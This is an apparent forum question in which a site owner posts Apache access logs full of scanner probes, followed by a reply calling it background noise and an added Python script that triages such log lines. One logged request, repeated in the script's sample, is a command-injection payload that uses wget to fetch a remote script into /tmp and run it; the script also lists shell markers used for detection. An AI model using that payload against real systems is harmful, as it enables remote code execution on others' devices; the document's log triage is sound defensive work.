
I've been getting strange page accesses showing up in my Apache error log recently. It seems as though someone is trying to access /wp-login.php, /elrekt.php and other pages that don't exist. It's obvious to me that this is malicious because my site does not use WordPress. I looked into my access logs and am now seeing a link to a GitHub repo attached to these GET requests. I am wondering how I can be aware of an attacker gaining access to my site, or of the precautions I can take. I don't believe they have made it through my login because these scripts have been running for the last three days. Here is some of my access_log:

66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /html/public/index.php HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /html/public/index.php HTTP/1.1" 404 816 "http://myip/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /public/index.php HTTP/1.1" 302 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /public/index.php HTTP/1.1" 404 816 "http://myip/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 816 "http://myip/TP/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /elrekt.php HTTP/1.1" 302 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /elrekt.php HTTP/1.1" 404 816 "http://myip/elrekt.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /index.php HTTP/1.1" 302 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /index.php HTTP/1.1" 404 816 "http://myip/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET / HTTP/1.1" 200 3181 "http://myip:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.228.19.80 - - [28/Jul/2019:11:38:36 +0000] "GET / HTTP/1.1" 200 3181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
79.137.46.233 - - [28/Jul/2019:12:08:55 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
79.137.46.233 - - [28/Jul/2019:12:08:56 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://www.mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.198.246.19 - - [28/Jul/2019:12:46:05 +0000] "GET / HTTP/1.0" 302 210 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
190.122.168.60 - - [28/Jul/2019:12:59:39 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
148.70.22.139 - - [28/Jul/2019:13:24:19 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 zgrab/0.x"
148.70.22.139 - - [28/Jul/2019:13:24:22 +0000] "GET / HTTP/1.1" 200 3181 "http://myip:80/" "Mozilla/5.0 zgrab/0.x"
185.53.88.40 - - [28/Jul/2019:14:01:03 +0000] "HEAD /robots.txt HTTP/1.0" 302 - "-" "-"
66.198.246.19 - - [28/Jul/2019:14:42:43 +0000] "GET / HTTP/1.0" 302 210 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
120.29.125.194 - - [28/Jul/2019:14:46:10 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://91.237.249.245/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ HTTP/1.1" 400 226 "-" "Hello, World"
37.221.157.20 - - [28/Jul/2019:15:03:17 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
52.67.133.128 - - [28/Jul/2019:15:57:57 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
52.67.133.128 - - [28/Jul/2019:15:57:57 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.59.36.9 - - [28/Jul/2019:16:20:18 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.59.36.9 - - [28/Jul/2019:16:20:19 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

More information as to what I'm dealing with here would also be very much appreciated.

Jordan
What you see is the typical background noise seen on all systems connected to the public internet, a continuous stream of remote and automated probes looking more or less randomly for systems vulnerable to known security issues. As long as your servers are kept secure and current, it's not an immediate worry. If you want, you can run an IDS/IPS/web-application firewall and something like fail2ban in an attempt to block those. – HBruijn Jul 30 '19 at 13:33
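An added example, not code from the question or from the comment above, of the kind of triage the comment points at: a small Python script that parses Apache combined-format lines like the ones in the question, separates self-announcing scanners (masscan, zgrab) and probes for software the site does not run (WordPress, ThinkPHP paths) from the two cases that deserve a human look (a decoded query carrying shell fragments, and a probe path that unexpectedly answers 200), and counts suspicious hits per client so a fail2ban-style threshold can be applied. The signature lists, the 200-on-probe rule, the threshold and the sample lines (RFC 5737 documentation addresses) are constructed assumptions for this example, not anything the thread documents.

```python
"""Triage Apache access_log lines: scanner noise vs. things to investigate.
Heuristic lists and sample log lines are constructed for this example."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed signature lists: tools that announce themselves in the User-Agent,
# paths belonging to software this site does not run, and shell fragments
# that have no business inside a URL.
SCANNER_UA = ("masscan", "zgrab")
PROBE_PATHS = ("/wp-login.php", "/xmlrpc.php", "/elrekt.php", "/TP/", "/public/index.php")
SHELL_MARKERS = (";", "|", "wget ", "curl ", "/tmp/", "`", "$(")


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded"] = unquote(rec["path"])  # %20, %27 ... back to characters
    return rec


def classify(rec):
    """Verdict for one parsed record, most serious check first."""
    decoded = rec["decoded"]
    if any(mk in decoded for mk in SHELL_MARKERS):
        return "exploit-attempt"          # command-injection style URL
    if any(p in decoded for p in PROBE_PATHS):
        # A probe for software we do not run should never get a 200;
        # if it does, something was installed or left behind on the host.
        return "probe-succeeded" if rec["status"] == 200 else "probe"
    if any(tag in rec["ua"].lower() for tag in SCANNER_UA):
        return "scanner"
    return "normal"


def triage(lines):
    """Return (per-line verdicts, Counter of non-normal requests per client IP)."""
    verdicts, per_ip = [], Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            verdicts.append(("unparsed", line))
            continue
        v = classify(rec)
        verdicts.append((v, rec["ip"], rec["decoded"], rec["status"]))
        if v != "normal":
            per_ip[rec["ip"]] += 1
    return verdicts, per_ip


def ban_candidates(per_ip, threshold=3):
    """Client IPs with at least `threshold` suspicious requests (fail2ban-style cut-off)."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


# Constructed sample modelled on the question's log; addresses are RFC 5737 documentation ranges.
SAMPLE = """\
203.0.113.10 - - [28/Jul/2019:11:33:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 816 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Jul/2019:11:33:06 +0000] "GET /elrekt.php HTTP/1.1" 404 816 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Jul/2019:11:33:07 +0000] "GET /public/index.php HTTP/1.1" 404 816 "-" "Mozilla/5.0"
198.51.100.5 - - [28/Jul/2019:11:38:36 +0000] "GET / HTTP/1.1" 200 3181 "-" "Mozilla/5.0 (Macintosh)"
198.51.100.9 - - [28/Jul/2019:12:46:05 +0000] "GET / HTTP/1.0" 302 210 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
198.51.100.22 - - [28/Jul/2019:14:01:03 +0000] "HEAD /robots.txt HTTP/1.0" 302 - "-" "-"
192.0.2.77 - - [28/Jul/2019:14:46:10 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.1/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ HTTP/1.1" 400 226 "-" "Hello, World"
192.0.2.88 - - [28/Jul/2019:16:20:19 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0 (X11; Ubuntu)"
"""

if __name__ == "__main__":
    verdicts, per_ip = triage(SAMPLE.splitlines())
    for v in verdicts:
        print(v)
    print("suspicious hits per IP:", dict(per_ip))
    print("ban candidates (>=3 hits):", ban_candidates(per_ip, 3))
```

On a real server you would feed `triage()` the tail of `/var/log/apache2/access.log` (path assumed) instead of the embedded sample; the verdicts `probe` and `scanner` are the background noise the comment describes, while `exploit-attempt` and especially `probe-succeeded` are the lines to read by hand, since a 200 on a path your site should not serve is the clearest sign in this log format that something changed on the host.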
